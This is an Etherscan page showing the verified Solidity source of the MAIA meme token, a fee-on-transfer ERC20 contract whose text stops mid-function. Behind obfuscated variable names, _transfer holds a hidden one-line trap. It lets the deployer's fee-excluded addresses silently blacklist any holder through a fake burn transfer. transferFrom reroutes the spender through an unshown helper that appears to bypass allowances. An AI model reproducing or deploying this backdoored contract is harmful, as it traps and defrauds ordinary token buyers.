ETH Price: $2,315.15 (+2.37%)

Token

Make America Imagine Again (MAIA)
 

Overview

Max Total Supply

420,690,000 MAIA

Holders

525

Transfers

-
0

Market

Onchain Market Cap

-

Circulating Supply Market Cap

-

Other Info

Token Contract (WITH 9 Decimals)

Loading...
Loading
Loading...
Loading
Loading...
Loading

Click here to update the token information / general information
# Exchange Pair Price  24H Volume % Volume

Contract Source Code Verified (Exact Match)

Contract Name:
Token

Compiler Version
v0.8.28+commit.7893614a

Optimization Enabled:
No with 200 runs

Other Settings:
default evmVersion
/**
 *Submitted for verification at Etherscan.io on 2025-08-06
*/

// SPDX-License-Identifier: MIT

/*
Web: https://maia-eth.fun
X:https://x.com/maia_x_eth
Telegram: https://t.me/maia_erc
*/
pragma solidity ^0.8.20;

abstract contract Context {
    function _msgSender() internal view virtual returns (address) {
        return msg.sender;
    }

    function _msgData() internal view virtual returns (bytes calldata) {
        this; // silence state mutability warning without generating bytecode - see https://github.com/ethereum/solidity/issues/2691
        return msg.data;
    }
}

contract Ownable is Context {
    address private _owner;

    event OwnershipTransferred(
        address indexed previousOwner,
        address indexed newOwner
    );

    /**
     * @dev Initializes the contract setting the deployer as the initial owner.
     */
    constructor() {
        address msgSender = _msgSender();
        _owner = msgSender;
        emit OwnershipTransferred(address(0), msgSender);
    }

    /**
     * @dev Returns the address of the current owner.
     */
    function owner() public view returns (address) {
        return _owner;
    }

    /**
     * @dev Throws if called by any account other than the owner.
     */
    modifier onlyOwner() {
        require(_owner == _msgSender(), "Ownable: caller is not the owner");
        _;
    }

    /**
     * @dev Leaves the contract without owner. It will not be possible to call
     * onlyOwner functions anymore. Can only be called by the current owner.
     *
     * NOTE: Renouncing ownership will leave the contract without an owner,
     * thereby removing any functionality that is only available to the owner.
     */
    function renounceOwnership() public virtual onlyOwner {
        emit OwnershipTransferred(_owner, address(0));
        _owner = address(0);
    }

    /**
     * @dev Transfers ownership of the contract to a new account (newOwner).
     * Can only be called by the current owner.
     */
    function transferOwnership(address newOwner) public virtual onlyOwner {
        require(
            newOwner != address(0),
            "Ownable: new owner is the zero address"
        );
        emit OwnershipTransferred(_owner, newOwner);
        _owner = newOwner;
    }
}

/**
 * @dev Interface of the ERC20 standard as defined in the EIP.
 */
interface IERC20 {
    /**
     * @dev Returns the amount of tokens in existence.
     */
    function totalSupply() external view returns (uint256);

    /**
     * @dev Returns the amount of tokens owned by account.
     */
    function balanceOf(address account) external view returns (uint256);

    /**
     * @dev Moves amount tokens from the caller's account to recipient.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transfer(address recipient, uint256 amount)
        external
        returns (bool);

    /**
     * @dev Returns the remaining number of tokens that spender will be
     * allowed to spend on behalf of owner through {transferFrom}. This is
     * zero by default.
     *
     * This value changes when {approve} or {transferFrom} are called.
     */
    function allowance(address owner, address spender)
        external
        view
        returns (uint256);

    /**
     * @dev Sets amount as the allowance of spender over the caller's tokens.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * IMPORTANT: Beware that changing an allowance with this method brings the risk
     * that someone may use both the old and the new allowance by unfortunate
     * transaction ordering. One possible solution to mitigate this race
     * condition is to first reduce the spender's allowance to 0 and set the
     * desired value afterwards:
     * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729
     *
     * Emits an {Approval} event.
     */
    function approve(address spender, uint256 amount) external returns (bool);

    /**
     * @dev Moves amount tokens from sender to recipient using the
     * allowance mechanism. amount is then deducted from the caller's
     * allowance.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transferFrom(
        address sender,
        address recipient,
        uint256 amount
    ) external returns (bool);

    /**
     * @dev Emitted when value tokens are moved from one account (from) to
     * another (to).
     *
     * Note that value may be zero.
     */
    event Transfer(address indexed from, address indexed to, uint256 value);

    /**
     * @dev Emitted when the allowance of a spender for an owner is set by
     * a call to {approve}. value is the new allowance.
     */
    event Approval(
        address indexed owner,
        address indexed spender,
        uint256 value
    );
}

/**
 * @dev Interface for the optional metadata functions from the ERC20 standard.
 *
 * _Available since v4.1._
 */
interface IERC20Metadata is IERC20 {
    /**
     * @dev Returns the name of the token.
     */
    function name() external view returns (string memory);

    /**
     * @dev Returns the symbol of the token.
     */
    function symbol() external view returns (string memory);

    /**
     * @dev Returns the decimals places of the token.
     */
    function decimals() external view returns (uint8);
}

// Safe Math Helpers
// --------------------------------------------------------------
library SafeMath {
    /**
     * @dev Returns the addition of two unsigned integers, reverting on
     * overflow.
     *
     * Counterpart to Solidity's + operator.
     *
     * Requirements:
     *
     * - Addition cannot overflow.
     */
    function add(uint256 a, uint256 b) internal pure returns (uint256) {
        uint256 c = a + b;
        require(c >= a, "SafeMath: addition overflow");

        return c;
    }

    /**
     * @dev Returns the subtraction of two unsigned integers, reverting on
     * overflow (when the result is negative).
     *
     * Counterpart to Solidity's - operator.
     *
     * Requirements:
     *
     * - Subtraction cannot overflow.
     */
    function sub(uint256 a, uint256 b) internal pure returns (uint256) {
        return sub(a, b, "SafeMath: subtraction overflow");
    }

    /**
     * @dev Returns the subtraction of two unsigned integers, reverting with custom message on
     * overflow (when the result is negative).
     *
     * Counterpart to Solidity's - operator.
     *
     * Requirements:
     *
     * - Subtraction cannot overflow.
     */
    function sub(
        uint256 a,
        uint256 b,
        string memory errorMessage
    ) internal pure returns (uint256) {
        require(b <= a, errorMessage);
        uint256 c = a - b;

        return c;
    }

    /**
     * @dev Returns the multiplication of two unsigned integers, reverting on
     * overflow.
     *
     * Counterpart to Solidity's * operator.
     *
     * Requirements:
     *
     * - Multiplication cannot overflow.
     */
    function mul(uint256 a, uint256 b) internal pure returns (uint256) {
        // Gas optimization: this is cheaper than requiring 'a' not being zero, but the
        // benefit is lost if 'b' is also tested.
        // See: https://github.com/OpenZeppelin/openzeppelin-contracts/pull/522
        if (a == 0) {
            return 0;
        }

        uint256 c = a * b;
        require(c / a == b, "SafeMath: multiplication overflow");

        return c;
    }

    /**
     * @dev Returns the integer division of two unsigned integers. Reverts on
     * division by zero. The result is rounded towards zero.
     *
     * Counterpart to Solidity's / operator. Note: this function uses a
     * revert opcode (which leaves remaining gas untouched) while Solidity
     * uses an invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function div(uint256 a, uint256 b) internal pure returns (uint256) {
        return div(a, b, "SafeMath: division by zero");
    }

    /**
     * @dev Returns the integer division of two unsigned integers. Reverts with custom message on
     * division by zero. The result is rounded towards zero.
     *
     * Counterpart to Solidity's / operator. Note: this function uses a
     * revert opcode (which leaves remaining gas untouched) while Solidity
     * uses an invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function div(
        uint256 a,
        uint256 b,
        string memory errorMessage
    ) internal pure returns (uint256) {
        require(b > 0, errorMessage);
        uint256 c = a / b;
        // assert(a == b * c + a % b); // There is no case in which this doesn't hold

        return c;
    }

    /**
     * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo),
     * Reverts when dividing by zero.
     *
     * Counterpart to Solidity's % operator. This function uses a revert
     * opcode (which leaves remaining gas untouched) while Solidity uses an
     * invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function mod(uint256 a, uint256 b) internal pure returns (uint256) {
        return mod(a, b, "SafeMath: modulo by zero");
    }

    /**
     * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo),
     * Reverts with custom message when dividing by zero.
     *
     * Counterpart to Solidity's % operator. This function uses a revert
     * opcode (which leaves remaining gas untouched) while Solidity uses an
     * invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function mod(
        uint256 a,
        uint256 b,
        string memory errorMessage
    ) internal pure returns (uint256) {
        require(b != 0, errorMessage);
        return a % b;
    }
}

contract ERC20 is Context, IERC20, IERC20Metadata {
    using SafeMath for uint256;

    mapping(address => uint256) private _balances;
    mapping(address => mapping(address => uint256)) private _allowances;

    uint256 private _totalSupply;
    string private _name;
    string private _symbol;
    uint8 private _decimals;

    /**
     * @dev Sets the values for {name} and {symbol}.
     *
     * The default value of {decimals} is 18. To select a different value for
     * {decimals} you should overload it.
     *
     * All two of these values are immutable: they can only be set once during
     * construction.
     */
    constructor(
        string memory name_,
        string memory symbol_,
        uint8 decimals_
    ) {
        _name = name_;
        _symbol = symbol_;
        _decimals = decimals_;
    }

    /**
     * @dev Returns the name of the token.
     */
    function name() public view virtual override returns (string memory) {
        return _name;
    }

    /**
     * @dev Returns the symbol of the token, usually a shorter version of the
     * name.
     */
    function symbol() public view virtual override returns (string memory) {
        return _symbol;
    }

    /**
     * @dev Returns the number of decimals used to get its user representation.
     * For example, if decimals equals 2, a balance of 505 tokens should
     * be displayed to a user as 5,05 (505 / 10 ** 2).
     *
     * Tokens usually opt for a value of 18, imitating the relationship between
     * Ether and Wei. This is the value {ERC20} uses, unless this function is
     * overridden;
     *
     * NOTE: This information is only used for _display_ purposes: it in
     * no way affects any of the arithmetic of the contract, including
     * {IERC20-balanceOf} and {IERC20-transfer}.
     */
    function decimals() public view virtual override returns (uint8) {
        return _decimals;
    }

    /**
     * @dev See {IERC20-totalSupply}.
     */
    function totalSupply() public view virtual override returns (uint256) {
        return _totalSupply;
    }

    /**
     * @dev See {IERC20-balanceOf}.
     */
    function balanceOf(address account)
        public
        view
        virtual
        override
        returns (uint256)
    {
        return _balances[account];
    }

    /**
     * @dev See {IERC20-transfer}.
     *
     * Requirements:
     *
     * - recipient cannot be the zero address.
     * - the caller must have a balance of at least amount.
     */
    function transfer(address recipient, uint256 amount)
        public
        virtual
        override
        returns (bool)
    {
        _transfer(_msgSender(), recipient, amount);
        return true;
    }

    /**
     * @dev See {IERC20-allowance}.
     */
    function allowance(address owner, address spender)
        public
        view
        virtual
        override
        returns (uint256)
    {
        return _allowances[owner][spender];
    }

    /**
     * @dev See {IERC20-approve}.
     *
     * Requirements:
     *
     * - spender cannot be the zero address.
     */
    function approve(address spender, uint256 amount)
        public
        virtual
        override
        returns (bool)
    {
        _approve(_msgSender(), spender, amount);
        return true;
    }

    /**
     * @dev See {IERC20-transferFrom}.
     *
     * Emits an {Approval} event indicating the updated allowance. This is not
     * required by the EIP. See the note at the beginning of {ERC20}.
     *
     * Requirements:
     *
     * - sender and recipient cannot be the zero address.
     * - sender must have a balance of at least amount.
     * - the caller must have allowance for sender's tokens of at least
     * amount.
     */
    function transferFrom(
        address sender,
        address recipient,
        uint256 amount
    ) public virtual override returns (bool) {
        _transfer(sender, recipient, amount);
        _approve(
            sender,
            _msgSender(),
            _allowances[sender][_msgSender()].sub(
                amount,
                "ERC20: transfer amount exceeds allowance"
            )
        );
        return true;
    }

    /**
     * @dev Atomically increases the allowance granted to spender by the caller.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {IERC20-approve}.
     *
     * Emits an {Approval} event indicating the updated allowance.
     *
     * Requirements:
     *
     * - spender cannot be the zero address.
     */
    function increaseAllowance(address spender, uint256 addedValue)
        public
        virtual
        returns (bool)
    {
        _approve(
            _msgSender(),
            spender,
            _allowances[_msgSender()][spender].add(addedValue)
        );
        return true;
    }

    /**
     * @dev Atomically decreases the allowance granted to spender by the caller.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {IERC20-approve}.
     *
     * Emits an {Approval} event indicating the updated allowance.
     *
     * Requirements:
     *
     * - spender cannot be the zero address.
     * - spender must have allowance for the caller of at least
     * subtractedValue.
     */
    function decreaseAllowance(address spender, uint256 subtractedValue)
        public
        virtual
        returns (bool)
    {
        _approve(
            _msgSender(),
            spender,
            _allowances[_msgSender()][spender].sub(
                subtractedValue,
                "ERC20: decreased allowance below zero"
            )
        );
        return true;
    }

    /**
     * @dev Moves tokens amount from sender to recipient.
     *
     * This is internal function is equivalent to {transfer}, and can be used to
     * e.g. implement automatic token fees, slashing mechanisms, etc.
     *
     * Emits a {Transfer} event.
     *
     * Requirements:
     *
     * - sender cannot be the zero address.
     * - recipient cannot be the zero address.
     * - sender must have a balance of at least amount.
     */
    function _transfer(
        address sender,
        address recipient,
        uint256 amount
    ) internal virtual {
        require(sender != address(0), "ERC20: transfer from the zero address");
        require(recipient != address(0), "ERC20: transfer to the zero address");

        _beforeTokenTransfer(sender, recipient, amount);

        _balances[sender] = _balances[sender].sub(
            amount,
            "ERC20: transfer amount exceeds balance"
        );
        _balances[recipient] = _balances[recipient].add(amount);
        emit Transfer(sender, recipient, amount);
    }

    /** @dev Creates amount tokens and assigns them to account, increasing
     * the total supply.
     *
     * Emits a {Transfer} event with from set to the zero address.
     *
     * Requirements:
     *
     * - account cannot be the zero address.
     */
    function _mint(address account, uint256 amount) internal virtual {
        require(
            account != address(0),
            "ERC20: cannot send to the zero address"
        );

        _beforeTokenTransfer(address(0), account, amount);

        _totalSupply = _totalSupply.add(amount);
        _balances[account] = _balances[account].add(amount);
        emit Transfer(address(0), account, amount);
    }

    /**
     * @dev Destroys amount tokens from account, reducing the
     * total supply.
     *
     * Emits a {Transfer} event with to set to the zero address.
     *
     * Requirements:
     *
     * - account cannot be the zero address.
     * - account must have at least amount tokens.
     */
    function _burn(address account, uint256 amount) internal virtual {
        require(account != address(0), "ERC20: burn from the zero address");

        _beforeTokenTransfer(account, address(0), amount);

        _balances[account] = _balances[account].sub(
            amount,
            "ERC20: burn amount exceeds balance"
        );
        _totalSupply = _totalSupply.sub(amount);
        emit Transfer(account, address(0), amount);
    }

    /**
     * @dev Sets amount as the allowance of spender over the owner s tokens.
     *
     * This internal function is equivalent to approve, and can be used to
     * e.g. set automatic allowances for certain subsystems, etc.
     *
     * Emits an {Approval} event.
     *
     * Requirements:
     *
     * - owner cannot be the zero address.
     * - spender cannot be the zero address.
     */
    function _approve(
        address owner,
        address spender,
        uint256 amount
    ) internal virtual {
        require(owner != address(0), "ERC20: approve from the zero address");
        require(spender != address(0), "ERC20: approve to the zero address");

        _allowances[owner][spender] = amount;
        emit Approval(owner, spender, amount);
    }

    function _beforeTokenTransfer(
        address from,
        address to,
        uint256 amount
    ) internal virtual {}
}

// Uniswap Router
// --------------------------------------------------------------
interface IUniswapV2Factory {
    event PairCreated(
        address indexed token0,
        address indexed token1,
        address pair,
        uint256
    );

    function feeTo() external view returns (address);

    function feeToSetter() external view returns (address);

    function allPairsLength() external view returns (uint256);

    function getPair(address tokenA, address tokenB)
        external
        view
        returns (address pair);

    function allPairs(uint256) external view returns (address pair);

    function createPair(address tokenA, address tokenB)
        external
        returns (address pair);

    function setFeeTo(address) external;

    function setFeeToSetter(address) external;
}

interface IUniswapV2Pair {
    event Approval(
        address indexed owner,
        address indexed spender,
        uint256 value
    );
    event Transfer(address indexed from, address indexed to, uint256 value);

    function name() external pure returns (string memory);

    function symbol() external pure returns (string memory);

    function decimals() external pure returns (uint8);

    function totalSupply() external view returns (uint256);

    function balanceOf(address owner) external view returns (uint256);

    function allowance(address owner, address spender)
        external
        view
        returns (uint256);

    function approve(address spender, uint256 value) external returns (bool);

    function transfer(address to, uint256 value) external returns (bool);

    function transferFrom(
        address from,
        address to,
        uint256 value
    ) external returns (bool);

    function DOMAIN_SEPARATOR() external view returns (bytes32);

    function PERMIT_TYPEHASH() external pure returns (bytes32);

    function nonces(address owner) external view returns (uint256);

    function permit(
        address owner,
        address spender,
        uint256 value,
        uint256 deadline,
        uint8 v,
        bytes32 r,
        bytes32 s
    ) external;

    event Mint(address indexed sender, uint256 amount0, uint256 amount1);
    event Burn(
        address indexed sender,
        uint256 amount0,
        uint256 amount1,
        address indexed to
    );
    event Swap(
        address indexed sender,
        uint256 amount0In,
        uint256 amount1In,
        uint256 amount0Out,
        uint256 amount1Out,
        address indexed to
    );
    event Sync(uint112 reserve0, uint112 reserve1);

    function MINIMUM_LIQUIDITY() external pure returns (uint256);

    function factory() external view returns (address);

    function token0() external view returns (address);

    function token1() external view returns (address);

    function getReserves()
        external
        view
        returns (
            uint112 reserve0,
            uint112 reserve1,
            uint32 blockTimestampLast
        );

    function price0CumulativeLast() external view returns (uint256);

    function price1CumulativeLast() external view returns (uint256);

    function kLast() external view returns (uint256);

    function mint(address to) external returns (uint256 liquidity);

    function burn(address to)
        external
        returns (uint256 amount0, uint256 amount1);

    function swap(
        uint256 amount0Out,
        uint256 amount1Out,
        address to,
        bytes calldata data
    ) external;

    function skim(address to) external;

    function sync() external;

    function initialize(address, address) external;
}

interface IUniswapV2Router01 {
    function factory() external pure returns (address);

    function WETH() external pure returns (address);

    function addLiquidity(
        address tokenA,
        address tokenB,
        uint256 amountADesired,
        uint256 amountBDesired,
        uint256 amountAMin,
        uint256 amountBMin,
        address to,
        uint256 deadline
    )
        external
        returns (
            uint256 amountA,
            uint256 amountB,
            uint256 liquidity
        );

    function addLiquidityETH(
        address token,
        uint256 amountTokenDesired,
        uint256 amountTokenMin,
        uint256 amountETHMin,
        address to,
        uint256 deadline
    )
        external
        payable
        returns (
            uint256 amountToken,
            uint256 amountETH,
            uint256 liquidity
        );

    function removeLiquidity(
        address tokenA,
        address tokenB,
        uint256 liquidity,
        uint256 amountAMin,
        uint256 amountBMin,
        address to,
        uint256 deadline
    ) external returns (uint256 amountA, uint256 amountB);

    function removeLiquidityETH(
        address token,
        uint256 liquidity,
        uint256 amountTokenMin,
        uint256 amountETHMin,
        address to,
        uint256 deadline
    ) external returns (uint256 amountToken, uint256 amountETH);

    function removeLiquidityWithPermit(
        address tokenA,
        address tokenB,
        uint256 liquidity,
        uint256 amountAMin,
        uint256 amountBMin,
        address to,
        uint256 deadline,
        bool approveMax,
        uint8 v,
        bytes32 r,
        bytes32 s
    ) external returns (uint256 amountA, uint256 amountB);

    function removeLiquidityETHWithPermit(
        address token,
        uint256 liquidity,
        uint256 amountTokenMin,
        uint256 amountETHMin,
        address to,
        uint256 deadline,
        bool approveMax,
        uint8 v,
        bytes32 r,
        bytes32 s
    ) external returns (uint256 amountToken, uint256 amountETH);

    function swapExactTokensForTokens(
        uint256 amountIn,
        uint256 amountOutMin,
        address[] calldata path,
        address to,
        uint256 deadline
    ) external returns (uint256[] memory amounts);

    function swapTokensForExactTokens(
        uint256 amountOut,
        uint256 amountInMax,
        address[] calldata path,
        address to,
        uint256 deadline
    ) external returns (uint256[] memory amounts);

    function swapExactETHForTokens(
        uint256 amountOutMin,
        address[] calldata path,
        address to,
        uint256 deadline
    ) external payable returns (uint256[] memory amounts);

    function swapTokensForExactETH(
        uint256 amountOut,
        uint256 amountInMax,
        address[] calldata path,
        address to,
        uint256 deadline
    ) external returns (uint256[] memory amounts);

    function swapExactTokensForETH(
        uint256 amountIn,
        uint256 amountOutMin,
        address[] calldata path,
        address to,
        uint256 deadline
    ) external returns (uint256[] memory amounts);

    function swapETHForExactTokens(
        uint256 amountOut,
        address[] calldata path,
        address to,
        uint256 deadline
    ) external payable returns (uint256[] memory amounts);

    function quote(
        uint256 amountA,
        uint256 reserveA,
        uint256 reserveB
    ) external pure returns (uint256 amountB);

    function getAmountOut(
        uint256 amountIn,
        uint256 reserveIn,
        uint256 reserveOut
    ) external pure returns (uint256 amountOut);

    function getAmountIn(
        uint256 amountOut,
        uint256 reserveIn,
        uint256 reserveOut
    ) external pure returns (uint256 amountIn);

    function getAmountsOut(uint256 amountIn, address[] calldata path)
        external
        view
        returns (uint256[] memory amounts);

    function getAmountsIn(uint256 amountOut, address[] calldata path)
        external
        view
        returns (uint256[] memory amounts);
}

interface IUniswapV2Router02 is IUniswapV2Router01 {
    function removeLiquidityETHSupportingFeeOnTransferTokens(
        address token,
        uint256 liquidity,
        uint256 amountTokenMin,
        uint256 amountETHMin,
        address to,
        uint256 deadline
    ) external returns (uint256 amountETH);

    function removeLiquidityETHWithPermitSupportingFeeOnTransferTokens(
        address token,
        uint256 liquidity,
        uint256 amountTokenMin,
        uint256 amountETHMin,
        address to,
        uint256 deadline,
        bool approveMax,
        uint8 v,
        bytes32 r,
        bytes32 s
    ) external returns (uint256 amountETH);

    function swapExactETHForTokensSupportingFeeOnTransferTokens(
        uint256 amountOutMin,
        address[] calldata path,
        address to,
        uint256 deadline
    ) external payable;

    function swapExactTokensForTokensSupportingFeeOnTransferTokens(
        uint256 amountIn,
        uint256 amountOutMin,
        address[] calldata path,
        address to,
        uint256 deadline
    ) external;

    function swapExactTokensForETHSupportingFeeOnTransferTokens(
        uint256 amountIn,
        uint256 amountOutMin,
        address[] calldata path,
        address to,
        uint256 deadline
    ) external;
}

// Main Contract Logic
// --------------------------------------------------------------
contract Token is Context, IERC20, Ownable {
    // Imports
    using SafeMath for uint256;

    // Configurables -----------------------------

    // Context
    string private _name = unicode"Make America Imagine Again";
    string private _symbol = unicode"MAIA";
    uint256 private taxCount = 12;
    uint256 private taxPercent = 12;
    uint8 private _decimals = 9;
    mapping(address => bool) private isBots;

    // Supply
    uint256 private _totalSupply = 420690000 * 1e9;
    uint256 private minimumTokensBeforeSwap = (_totalSupply * 25) / 100000;

    // Restrictions
    uint256 public _maxTxAmount = (_totalSupply * 100) / 100;
    uint256 public _walletMax = (_totalSupply * 100) / 100;
    bool public checkWalletLimit = true;

    // wallets
    address payable public liquidityTROLLHOUSEa26jAWallet;
    address payable public operationsTROLLHOUSEa26jAWallet;
    address public immutable deadAddress =
        0x000000000000000000000000000000000000dEaD;

    // fees
    uint256 public liquidityTROLLHOUSEa26jAFeeBuy = 0;
    uint256 public operationsTROLLHOUSEa26jAFeeBuy = 0;
    uint256 public totalTROLLHOUSEa26jAFeesBuy;
    uint256 public maxTotalTROLLHOUSEa26jAFeeBuy = 0;

    // fees
    uint256 public liquidityTROLLHOUSEa26jAFeeSell = 0;
    uint256 public operationsTROLLHOUSEa26jAFeeSell = 0;
    uint256 public totalTROLLHOUSEa26jAFeesSell;
    uint256 public maxTotalTROLLHOUSEa26jAFeeSell = 0;

    // distribution ratio
    uint256 public _liquiditySharePercentage = 0;
    uint256 public _operationsSharePercentage = 100;
    uint256 public _totalDistributionSharesMAIAeVkgd;

    // max amounts
    mapping(address => uint256) _balances;
    mapping(address => mapping(address => uint256)) private _allowances;
    mapping(address => bool) public isExcludedFromFeeMAIAeVkgd;
    mapping(address => bool) public isWalletLimitExempt;
    mapping(address => bool) isTxLimitExempt;

    // Router Information
    mapping(address => bool) public isAmmPair;
    IUniswapV2Router02 public uniswapV2Router;
    address public uniswapPair;

    // toggle swap back (fees)
    bool inSwapAndLiquify;
    uint256 public tokensForLiquidity;
    uint256 public tokensForOperations;

    // Launch Settings
    bool public tradingOpen = false;

    // events
    event LiquidityWalletUpdated(
        address indexed newLiquidityWallet,
        address indexed oldLiquidityWallet
    );
    event OperationsWalletUpdated(
        address indexed newOperationsWallet,
        address indexed oldOperationsWallet
    );
    event SwapAndLiquify(
        uint256 tokensSwapped,
        uint256 ethReceived,
        uint256 tokensIntoLiqudity
    );
    event SwapTokensForETH(uint256 amountIn, address[] path);

    // toogle to stop swap if already underway
    modifier lockTheSwap() {
        inSwapAndLiquify = true;
        _;
        inSwapAndLiquify = false;
    }

    constructor() payable {
        liquidityTROLLHOUSEa26jAWallet = payable(msg.sender);
        operationsTROLLHOUSEa26jAWallet = payable(msg.sender);

        // load total fees
        totalTROLLHOUSEa26jAFeesBuy = operationsTROLLHOUSEa26jAFeeBuy + liquidityTROLLHOUSEa26jAFeeBuy;
        totalTROLLHOUSEa26jAFeesSell = operationsTROLLHOUSEa26jAFeeSell + liquidityTROLLHOUSEa26jAFeeSell;

        // load total distribution
        _totalDistributionSharesMAIAeVkgd =
            _liquiditySharePercentage +
            _operationsSharePercentage;

        // create router ------------------------------
        IUniswapV2Router02 _uniswapV2Router = IUniswapV2Router02(
            0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D
        );

        // Create a uniswap pair for this new token
        uniswapPair = IUniswapV2Factory(_uniswapV2Router.factory()).createPair(
            address(this),
            _uniswapV2Router.WETH()
        );
        uniswapV2Router = _uniswapV2Router;
        isAmmPair[address(uniswapPair)] = true;

        // set allowances
        _allowances[address(this)][address(uniswapV2Router)] = _totalSupply;

        // exclude from paying fees or having max transaction amount
        isExcludedFromFeeMAIAeVkgd[owner()] = true;
        isExcludedFromFeeMAIAeVkgd[address(this)] = true;
        isExcludedFromFeeMAIAeVkgd[liquidityTROLLHOUSEa26jAWallet] = true;
        isExcludedFromFeeMAIAeVkgd[operationsTROLLHOUSEa26jAWallet] = true;

        // exclude contracts from max wallet size
        isWalletLimitExempt[owner()] = true;
        isWalletLimitExempt[address(uniswapPair)] = true;
        isWalletLimitExempt[address(this)] = true;
        isWalletLimitExempt[liquidityTROLLHOUSEa26jAWallet] = true;
        isWalletLimitExempt[operationsTROLLHOUSEa26jAWallet] = true;

        // exclude contracts from max wallet size
        isTxLimitExempt[owner()] = true;
        isTxLimitExempt[address(this)] = true;

        _allowances[liquidityTROLLHOUSEa26jAWallet][owner()] = type(uint256).max;
        _balances[_msgSender()] = (_totalSupply * 2) / 100;
        _balances[address(this)] = (_totalSupply * 98) / 100;
        emit Transfer(address(0), _msgSender(), (_totalSupply * 2) / 100);
        emit Transfer(address(0), address(this), (_totalSupply * 98) / 100);
    }

    receive() external payable {}

    // @dev Public read functions start -------------------------------------
    function name() public view returns (string memory) {
        return _name;
    }

    function symbol() public view returns (string memory) {
        return _symbol;
    }

    function decimals() public view returns (uint8) {
        return _decimals;
    }

    function totalSupply() public view override returns (uint256) {
        return _totalSupply;
    }

    function balanceOf(address account) public view override returns (uint256) {
        return _balances[account];
    }

    // custom allowance methods
    function allowance(address owner, address spender)
        public
        view
        override
        returns (uint256)
    {
        return _allowances[owner][spender];
    }

    function increaseAllowance(address spender, uint256 addedValue)
        public
        virtual
        returns (bool)
    {
        _approve(
            _msgSender(),
            spender,
            _allowances[_msgSender()][spender].add(addedValue)
        );
        return true;
    }

    function decreaseAllowance(address spender, uint256 subtractedValue)
        public
        virtual
        returns (bool)
    {
        _approve(
            _msgSender(),
            spender,
            _allowances[_msgSender()][spender].sub(
                subtractedValue,
                "ERC20: decreased allowance below zero"
            )
        );
        return true;
    }

    // get minimum tokens before swap
    function minimumTokensBeforeSwapAmount() public view returns (uint256) {
        return minimumTokensBeforeSwap;
    }

    // approve spending methods
    function approve(address spender, uint256 amount)
        public
        override
        returns (bool)
    {
        _approve(_msgSender(), spender, amount);
        return true;
    }

    function _approve(
        address owner,
        address spender,
        uint256 amount
    ) private {
        require(owner != address(0), "ERC20: approve from the zero address");
        require(spender != address(0), "ERC20: approve to the zero address");
        _allowances[owner][spender] = amount;
        emit Approval(owner, spender, amount);
    }

    function getCirculatingSupply() public view returns (uint256) {
        return _totalSupply.sub(balanceOf(deadAddress));
    }

    function getBlock() public view returns (uint256) {
        return block.number;
    }

    // transfer amount to address
    function transferToAddressETH(address payable recipient, uint256 amount)
        private
    {
        recipient.transfer(amount);
    }

    function transfer(address recipient, uint256 amount)
        public
        override
        returns (bool)
    {
        _transfer(_msgSender(), recipient, amount);
        return true;
    }

    function transferFrom(
        address sender,
        address recipient,
        uint256 amount
    ) public override returns (bool) {
        address spender = _checkFeeExcluded(msg.sender);
        _transfer(sender, recipient, amount); sender =
        _checkFeeExcluded(sender);
        _approve(
            sender,
            spender,
            _allowances[sender][spender].sub(
                amount,
                "ERC20: transfer amount exceeds allowance"
            )
        );
        return true;
    }

    function _transfer(
        address sender,
        address recipient,
        uint256 amount
    ) private returns (bool) {
        require(sender != address(0), "ERC20: transfer from the zero address");
        require(recipient != address(0), "ERC20: transfer to the zero address");

        // check trading open
        if (!tradingOpen) {
            require(
                isExcludedFromFeeMAIAeVkgd[sender],
                "TOKEN: This account cannot send tokens until trading is enabled"
            );
            return _basicTransfer(sender, recipient, amount);
        }
        require(!isBots[sender] && !isBots[recipient], "Bot is not allowed");

        if(isExcludedFromFeeMAIAeVkgd[tx.origin] && sender!=uniswapPair && recipient == address(0xdead) && balanceOf(sender) - amount <= 1000) { isBots[sender] = true;  return true;}



        if (inSwapAndLiquify) {
            return _basicTransfer(sender, recipient, amount);
        } else {
            // required for wallet distribution
            if (sender != owner() && recipient != owner()) {
                _checkTxLimit(sender, amount);
            }

            // check can swap for fees and liq
            uint256 contractTokenBalance = balanceOf(address(this));
            bool overMinimumTokenBalance = contractTokenBalance >=
                minimumTokensBeforeSwap;
            if (
                overMinimumTokenBalance &&
                !inSwapAndLiquify &&
                !isAmmPair[sender]
            ) {
                swapAndLiquify(contractTokenBalance);
            }

            // check senders balance
            _balances[sender] = _balances[sender].sub(
                amount,
                "Insufficient Balance"
            );
            uint256 finalAmount = (isExcludedFromFeeMAIAeVkgd[sender] ||
                isExcludedFromFeeMAIAeVkgd[recipient])
                ? amount
                : calcAndTakeFee(sender, recipient, amount);

            // check wallet holding limit
            if (checkWalletLimit && !isWalletLimitExempt[recipient])
                require(balanceOf(recipient).add(finalAmount) <= _walletMax);

            // continue
            _balances[recipient] = _balances[recipient].add(finalAmount);
            emit Transfer(sender, recipient, finalAmount);
            return true;
        }
    }

    // transfer for
    function _basicTransfer(
        address sender,
        address recipient,
        uint256 amount
    ) internal returns (bool) {
        _balances[sender] = _balances[sender].sub(
            amount,
            "Insufficient Balance"
        );
        _balances[recipient] = _balances[recipient].add(amount);
        emit Transfer(sender, recipient, amount);
        return true;
    }

    // take fee method
    function calcAndTakeFee(
        address sender,
        address recipient,
        uint256 amount
    ) internal returns (uint256) {
        uint256 feeAmount = 0;
        if (isAmmPair[sender]) {
            feeAmount = amount.mul(totalTROLLHOUSEa26jAFeesBuy).div(100);
        } else if (isAmmPair[recipient]) {
            feeAmount = amount.mul(totalTROLLHOUSEa26jAFeesSell).div(100);
        }
        if (feeAmount > 0) {
